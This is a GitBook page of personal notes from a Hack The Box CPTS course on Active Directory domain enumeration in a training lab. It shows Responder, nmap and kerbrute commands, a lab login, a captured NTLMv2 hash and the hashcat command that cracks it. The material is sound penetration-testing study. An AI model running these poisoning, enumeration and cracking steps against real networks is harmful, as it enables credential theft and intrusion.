👽
ALi3nW3rX
  • 👽ALi3NW3RX - Home Page
  • 🧧Resources
  • MITRE ATT&CK
  • Cyber Kill Chain
  • Education
    • ⚪Training Platforms
      • Attack & Defense
      • Hack The Box
      • Hack The Box Academy
      • Pentester Academy
      • Pentester Lab
      • PortSwigger Academy
      • Proving Grounds (PGP)
      • PwnTillDawn
      • Try Hack Me
    • 🟣Courses
      • Free Courses
        • API Penetration Testing Course
      • Paid Courses
        • OSCP
        • Pentester Academy
          • CRTP
            • CRTP Step By Step In Objectives
              • Obj 1 Enumeration
              • Obj 2 Enumeration
              • Obj 3 Enumeration
              • Obj 4 Enumeration
              • Obj 5 Local Priv Esc
              • Obj 6 BloodHound
              • Obj 7 Derivative Local Admin
              • Obj 8 Golden Ticket / DCSync
              • Obj 9 Silver Ticket for Host
              • Obj 10 Skeleton Key
              • Obj 11 DSRM
              • Obj 12 DCSync
              • Obj 13 Security Descriptors
              • Obj 14 Kerberoast Pass Crack
              • Obj 15 Unconstrained Delegation
            • CRTP Diagrams
          • CRTE
        • Hack The Box
          • CPTS
            • Common Terms (Cheat Sheet)
            • OWASP Top 10 2021
            • ACTIVE DIRECTORY ENUMERATION & ATTACKS
              • Enum Cheat Sheet
              • Tools of The Trade
              • Initial Enumeration of the Domain
              • LLMNR/NBT-NS Poisoning - from Linux
              • LLMNR/NBT-NS Poisoning - from Windows
              • Password Spraying Overview
              • Enumerating & Retrieving Password Policies
              • Password Spraying - Making a Target User List
              • Page 4
              • Page 3
              • Page 1
            • Page 2
  • Reverse Shells
    • revshells.com
  • C2
    • 🔴Cobalt Strike
      • Articles & Instructions
      • Resources
        • CS Cheat Sheet
        • Command Reference
        • Aggressor Scripts
        • RedTeam-OffensiveSecurity
      • Videos
  • WINDOWS
    • Active Directory Attack Map
    • Wadcoms
    • 🟢Recon
    • 🟢Enumeration
      • No Credentials
      • PowerView Enumeration
        • WMI
        • Domain Enumeration
        • Domain Trusts
        • Users
          • Find Local Admin Access
          • Find Active Sessions
        • Groups
        • Computers
        • Shares
        • GPO's
        • OU's
        • ACL's
      • Valid Credentials
    • 🟡FootHold
    • 🟡Local Priv Esc
      • PowerUp
      • ByPasses
      • Local Privilege Escalation
        • Local Priv Esc Using PowerUp.ps1
      • DSRM
    • 🟠Credential Harvesting
      • Dump NTDS.dit
    • 🟠Post Exploitation
    • 🟠Persistence
    • 🔴Domain Priv Esc
      • Domain Privilege Escalation
        • Enterprise Admins
        • DNS Admins
        • Constrained Delegation
        • Unconstrained Delegation
        • Set SPN
        • AS-REPS Roasting
        • Kerberoast
    • 🔴Lateral Movement & Pivoting
      • Lateral Movement
      • PowerShell Remoting
      • Reverse Shells
      • Pass The Hash
      • Over Pass The Hash
    • 🔴Attacks
      • DCSync
      • ACL
      • DSRM
      • AdminSDHolder
      • Print Nightmare
    • 🔴Forests & Trusts
      • Cross Forest Attacks
    • 🔵Defense & Hardening
    • 🔧Tools
      • BloodHound
      • Certipy
      • Commando-VM
      • CrackMapExec
        • CME Quick Reference
        • Protocols
          • SSH
            • Password Spraying
            • Authentication
            • Command Execution
          • MSSQL
            • Password Spraying
            • Authentication
            • Privesc
            • Command Execution
            • Upload/Download
            • Windows Commands
          • LDAP
            • Authentication
            • ASREPRoast
            • Find Domain SID
            • Kerberoasting
            • Unconstrained delegation
            • Admin Count
            • Machine Account Quota
            • Get user descriptions
            • Dump GMSA
            • Exploit ESC8 (ADCS)
            • Extract Subnet
            • LDAP Signing
            • Read DACL rights
          • FTP
            • Password Spraying
          • WINRM
            • Password Spraying
            • Authentication
            • Command Execution
            • LAPS
          • RDP
            • Password Spraying
            • Screenshot (Connected)
            • Screenshot (Not Connected)
        • Using Kerberos
        • Using Modules
        • Using The Database
        • BloodHound Integration
        • Scan for Vulnerabilities
        • Enumeration
          • Hosts
          • Null Sessions
          • Anonymous Login
          • Active Sessions
          • Shares and Access
          • Disks
          • Logged on Users
          • Domain Users
          • Users BruteForce RID
          • Domain Groups
          • Local Groups
          • Password Policy
          • SMB Signing NOT Required
        • Password Spraying
        • Authentication
          • Checking Domain Credentials
          • Checking Local Credentials
        • Command Execution
          • Remote Command Execution
          • Shells
        • Spidering Shares
        • Get and Put Files
        • Obtaining Credentials
          • Dump SAM
          • Dump LSA
          • Dump NTDS.dit
          • Dump LSASS
          • Dump WIFI Password
          • Dump KeyPass
        • LAPS
        • Spooler / WebDAV
        • MS Teams Cookies
      • Forensia
      • Inveigh
      • LaZagne
      • Ligolo / SSH Tunneling
      • LinWinPwn
      • MimiKatz.ps1
        • Golden Ticket
        • Silver Ticket
        • Skeleton Key
      • Rubeus
      • SharpCollection
      • SQLRecon
    • ✍️Scripts
      • FilelessNTDllReflection
      • FilelessRemotePE
      • ExecRemoteAssembly
  • Offensive Programming
    • RUST
      • Links
  • LINUX
    • Linux Terminal Commands
      • Git Cheat Sheet
      • Grep Cheat Sheet
    • Path to Root
    • Bash Cheat Sheet
    • Priv Esc
      • LD_Preload / SETENV
  • WEB APPS
    • Web Apps
      • LFI
      • XXE
  • DATABASES
    • Mysql
    • Postgresql
    • Redis
  • Common Tools & Commands
    • Protocols
      • FTP
      • RDP
      • SMB
      • SSH
    • Primary Tools
      • Hashcat
      • Responder
      • SQLMap
      • Chisel
      • CURL
      • XFREERDP
      • SSH
      • GOBUSTER
      • SNMP
      • NMAP
      • SMBCLIENT
      • WHATWEB
    • Editors
      • VIM
    • Misc Tools
      • ChatGPT
  • NETWORKING
    • Subnetting Cheat Sheet
  • SCRIPTS
    • Enum Scripts
  • MISC
    • Programming
      • GO
        • GoLangBot.Com
        • Ping Sweeper
      • NIM
    • Temp - Notes
Powered by GitBook
On this page
  • There are several ways to gain SYSTEM-level access on a host, including but not limited to:
  • By gaining SYSTEM-level access on a domain-joined host, you will be able to perform actions such as, but not limited to:
  • Let's find a user!
  1. Education
  2. Courses
  3. Paid Courses
  4. Hack The Box
  5. CPTS
  6. ACTIVE DIRECTORY ENUMERATION & ATTACKS

Initial Enumeration of the Domain

Key Data Points

Data Point

Description

AD Users

We are trying to enumerate valid user accounts we can target for password spraying.

AD Joined Computers

Key Computers include Domain Controllers, file servers, SQL servers, web servers, Exchange mail servers, database servers, etc.

Key Services

Kerberos, NetBIOS, LDAP, DNS

Vulnerable Hosts and Services

Anything that can be a quick win. ( a.k.a an easy host to exploit and gain a foothold)

Passive and Active Enumeration on the Network

Wireshark
#TCPDUMP
sudo tcpdump -i ens224
#responder
sudo responder -I ens224 -A
#fping
fping -asgq 172.16.5.0/23
#nmap
sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum
nmap -A 172.16.5.100
#kerbrute to find valid usernames
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users

There are several ways to gain SYSTEM-level access on a host, including but not limited to:

  • Remote Windows exploits such as MS08-067, EternalBlue, or BlueKeep.

  • Local privilege escalation flaws in Windows operating systems such as the Windows 10 Task Scheduler 0-day.

  • Gaining admin access on a domain-joined host with a local account and using Psexec to launch a SYSTEM cmd window

By gaining SYSTEM-level access on a domain-joined host, you will be able to perform actions such as, but not limited to:

  • Enumerate the domain using built-in tools or offensive tools such as BloodHound and PowerView.

  • Perform Kerberoasting / ASREPRoasting attacks within the same domain.

  • Run tools such as Inveigh to gather Net-NTLMv2 hashes or perform SMB relay attacks.

  • Perform token impersonation to hijack a privileged domain user account.

  • Carry out ACL attacks.

Let's find a user!

SSH to 10.129.106.30 with user "htb-student" and password "HTB_@cademy_stdnt!"

Responder retrieved

B] NTLMv2-SSP Client   : 172.16.5.130
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\backupagent
[SMB] NTLMv2-SSP Hash     : backupagent::INLANEFREIGHT:ea342ab38223e77f:9E35FC99FBF5CBA081F66BC94381488E:0101000000000000802B0FC3890ED901E9C7F95077F4303300000000020008004A0049004300360001001E00570049004E002D005A004C004A004F0039003500450057004A004300530004003400570049004E002D005A004C004A004F0039003500450057004A00430053002E004A004900430036002E004C004F00430041004C00030014004A004900430036002E004C004F00430041004C00050014004A004900430036002E004C004F00430041004C0007000800802B0FC3890ED90106000400020000000800300030000000000000000000000000300000743F935961283F64BAA5A866993BF125129AABD0076CCB8906D5355156650D9A0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000

Cracked with hashcat 

#hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
h1backup55
PreviousTools of The TradeNextLLMNR/NBT-NS Poisoning - from Linux

Last updated 2 years ago

Abusing a service running in the context of the SYSTEM account, or abusing the service account SeImpersonate privileges using . This type of attack is possible on older Windows OS' but not always possible with Windows Server 2019.

🟣
Juicy Potato